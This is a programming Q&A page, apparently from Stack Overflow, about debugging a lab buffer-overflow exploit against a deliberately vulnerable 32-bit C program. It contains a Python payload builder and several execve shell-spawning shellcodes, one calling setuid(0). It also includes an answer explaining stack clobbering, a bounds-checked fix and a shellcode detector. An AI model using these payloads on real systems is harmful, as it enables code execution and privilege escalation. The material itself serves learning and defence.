Tags: assembly, buffer-overflow, shellcode

(radare2, shellcode) int 0x80 jumping to invalid address


I'm executing a 32-bit program (my arch is 64-bit).

Vulnerable code:

#include <string.h>
#include <stdio.h>

void copier(char *str);   /* prototype so the call in main() is declared */

int main(int argc, char *argv[]) {
    copier(argv[1]);
    printf("Done!\n");
    return 0;
}

/* Deliberately vulnerable: strcpy() copies argv[1] into a 100-byte stack
 * buffer with no length check, so a longer argument overwrites the saved
 * EBP and return address above it. */
void copier(char *str) {
    char buffer[100];
    strcpy(buffer, str);
}


Exploit:

#!/usr/bin/python3

# address the overwritten return pointer should jump to (inside the NOP sled)
ret = b"\xb0\xcd\xff\xff"

# jmp/call/pop execve("/bin/bash") shellcode
shellcode = (b"\xeb\x1d\x5e\x8d\x46\x05\x31\xdb\x88\x5e\x09\x89\x70\x05\x89\x5e\x0e\x8d"
             b"\x1e\x8d\x48\x05\x8d\x50\x09\x31\xc0\xb0\x0b\xcd\x80\xe8\xde\xff\xff\xff"
             b"\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43")

# 40-byte NOP sled + shellcode + padding up to the 112 bytes that precede
# the saved return address, then the return address itself
payload = b"\x90"*40 + shellcode + b"A"*(112 - 40 - len(shellcode)) + ret

with open("bo1.payload", "wb") as f:
    f.write(payload)


But when exploiting, it doesn't work. When executed outside the debugger there is a segmentation fault.
[Screenshot: before int 0x80]
[Screenshot: just after int 0x80]
Q1: I think this is because the execve replaced the previous code. Is that right?
So I pressed 'q' and used the command 'dc' to continue.

[0xf7dd7c30]> dc
Selecting and continuing: 16145
child stopped with signal 17
[+] SIGNAL 17 errno=0 addr=0x3e80000546d code=1 ret=0
got signal...
[+] signal 17 aka SIGCHLD received 0

[3]+  Arrêté                r2 -d ./bo1 $(cat bo1.payload)


Q2: Why 'child stopped with signal 17' and no shell prompt after int 0x80?

Edit:
ASLR disabled with: sysctl -w kernel.randomize_va_space=0
Compiled with: 'gcc -g -fno-stack-protector -z execstack -m32 -o bo1 bo1.c'

Edit2:
Apparently the problem is in the shellcode. I tried all of these; only the last one works and gave me a shell prompt.

# 1: close(0), open("/dev/tty", ...), then execve("/bin//sh")
shellcode = (b"\x31\xc0\x31\xdb\xb0\x06\xcd\x80"
             b"\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80"
             b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80")

# 2: classic push-built execve("/bin//sh"), no call/pop
shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
             b"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")

# 3: exit(0) only (sanity test)
shellcode = (b"\x31\xc0\xb0\x01\x31\xdb\xcd\x80")

# 4: jmp/call/pop execve("/bin/bash")
shellcode = (b"\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89\x46\x0e\x8d\x1e\x8d\x4e"
             b"\x0a\x8d\x56\x0e\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f"
             b"\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43")

# 5: jmp/call/pop execve("/bin/bash"), the one used in the exploit above
shellcode = (b"\xeb\x1d\x5e\x8d\x46\x05\x31\xdb\x88\x5e\x09\x89\x70\x05\x89\x5e\x0e\x8d"
             b"\x1e\x8d\x48\x05\x8d\x50\x09\x31\xc0\xb0\x0b\xcd\x80\xe8\xde\xff\xff\xff"
             b"\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43")

# 6: setuid(0), then push-built execve("//bin/sh"); the only one that worked
shellcode = (b"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2"
             b"\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
             b"\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80")
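The copier() in the question is the textbook unchecked strcpy(), and the compile flags quoted above remove the two mitigations that would otherwise interfere: -fno-stack-protector drops the stack canary and -z execstack makes the stack executable. As an added example that is not part of the original question or answer, here is a bounds-checked replacement, copier_checked(), that refuses any input which would not fit in the same 100-byte buffer together with its terminator. The function names and the copier_checked_len() test helper are my own and do not come from the page.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 100   /* same size as buffer[100] in the question's copier() */

/*
 * Hypothetical hardened replacement for copier(): copies str into a
 * fixed-size stack buffer only when it fits together with its NUL terminator.
 * Returns 0 on success and -1 when the input would overflow the buffer,
 * which is exactly the case the strcpy() version silently allows.
 */
int copier_checked(const char *str)
{
    char buffer[BUF_SIZE];
    size_t len = strlen(str);

    if (len >= sizeof buffer)       /* 99 bytes is the longest that fits */
        return -1;
    memcpy(buffer, str, len + 1);   /* copy the terminator as well */
    return 0;
}

/* Test helper (mine, not the page's): feed copier_checked() n bytes of 'A'. */
int copier_checked_len(size_t n)
{
    char tmp[256];

    if (n >= sizeof tmp)
        return -1;
    memset(tmp, 'A', n);
    tmp[n] = '\0';
    return copier_checked(tmp);
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (copier_checked(argv[1]) != 0) {
        fprintf(stderr, "rejected: %zu bytes, max %d\n",
                strlen(argv[1]), BUF_SIZE - 1);
        return 1;
    }
    printf("Done!\n");
    return 0;
}
```

With this version the 112-byte payload from the exploit script is rejected before anything is copied; the same check belongs in front of any fixed-capacity destination, and strncpy() alone is not a substitute because it does not guarantee termination.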


Solution

  • The reason itself is easy enough to explain: the push instructions in the shellcode erased the ending bytes of the shellcode (notice the EIP is on the stack and very near ESP, right?). Prefixing the shellcode with "add esp, 0x70" is enough most of the time.

    However, I think you need to learn how to debug the program before asking questions. Use gdb, learn some assembly, and learn how shellcode works, so that you can understand why it does not work.

    For example, shellcode 1 ends with \xcd\x80, which is int 0x80. But when you debug, the final int 0x80 disappears before the final execve call completes. That is strange, therefore one needs to consider what has modified the shellcode.
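The answer's point is that the jmp/call/pop shellcodes depend on a call, that is a stack write, to find their own address, while the push-built execve variants do not. The following Python script is an added example and not code from the question or the answer: a small static heuristic of the kind an IDS or shellcode emulator applies as a GetPC check. It scans an x86 blob for `e8 rel32` calls whose target is a one-byte pop, for the entry short jump that feeds such a call, and counts int 0x80 syscalls, so a blob that relies on a stack write to run is flagged before anyone spends time in a debugger. The two sample blobs are shellcode 2 and shellcode 5 from the question's Edit2; all function names are mine.

```python
import struct

# Constructed samples, copied from the question's Edit2 (shellcode 2 and shellcode 5)
SAMPLE_PUSH_EXECVE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
                      b"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
SAMPLE_JMP_CALL_POP = (b"\xeb\x1d\x5e\x8d\x46\x05\x31\xdb\x88\x5e\x09\x89\x70\x05\x89\x5e\x0e\x8d"
                       b"\x1e\x8d\x48\x05\x8d\x50\x09\x31\xc0\xb0\x0b\xcd\x80\xe8\xde\xff\xff\xff"
                       b"\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43")

INT80 = b"\xcd\x80"                       # int 0x80: the 32-bit Linux syscall gate
POP_REG = {0x58 + r for r in range(8)}    # pop eax .. pop edi (one-byte opcodes 0x58-0x5f)


def entry_short_jump(code):
    """If the blob starts with 'eb rel8' (jmp short), return the jump target
    offset inside the blob, else None. jmp/call/pop shellcode opens this way."""
    if len(code) < 2 or code[0] != 0xEB:
        return None
    rel = struct.unpack_from("<b", code, 1)[0]
    target = 2 + rel
    return target if 0 <= target < len(code) else None


def find_getpc_calls(code):
    """Heuristic: every 'e8 rel32' whose target lies inside the blob and is a
    one-byte pop. That pair is the GetPC idiom: the call pushes the address of
    the bytes that follow it (usually a string) and the pop retrieves it. The
    push is the stack write the answer above blames for clobbered bytes."""
    hits = []
    for i in range(len(code) - 4):          # need 5 bytes: opcode + rel32
        if code[i] != 0xE8:
            continue
        rel = struct.unpack_from("<i", code, i + 1)[0]
        target = i + 5 + rel
        if 0 <= target < len(code) and code[target] in POP_REG:
            hits.append((i, target))
    return hits


def analyse(code):
    """Summarise the static features a GetPC/syscall heuristic keys on."""
    calls = find_getpc_calls(code)
    # data the pushed return address points at (the path string for execve)
    call_data = code[calls[-1][0] + 5:] if calls else b""
    return {
        "length": len(code),
        "syscalls": code.count(INT80),
        "entry_jump_target": entry_short_jump(code),
        "getpc_calls": calls,
        "uses_stack_getpc": bool(calls),
        "call_data": call_data,
    }


if __name__ == "__main__":
    for name, blob in (("push-built execve", SAMPLE_PUSH_EXECVE),
                       ("jmp/call/pop", SAMPLE_JMP_CALL_POP)):
        print(name, analyse(blob))
```

For shellcode 5 the scanner reports the entry jump landing on the call at offset 31, the call returning to the pop at offset 2, and "/bin/bash" followed by the argv/envp placeholder bytes as the data the call pushes a pointer to; shellcode 2 has no call at all, which is consistent with the answer's explanation of why the push-built variants survive where the jmp/call/pop ones do not.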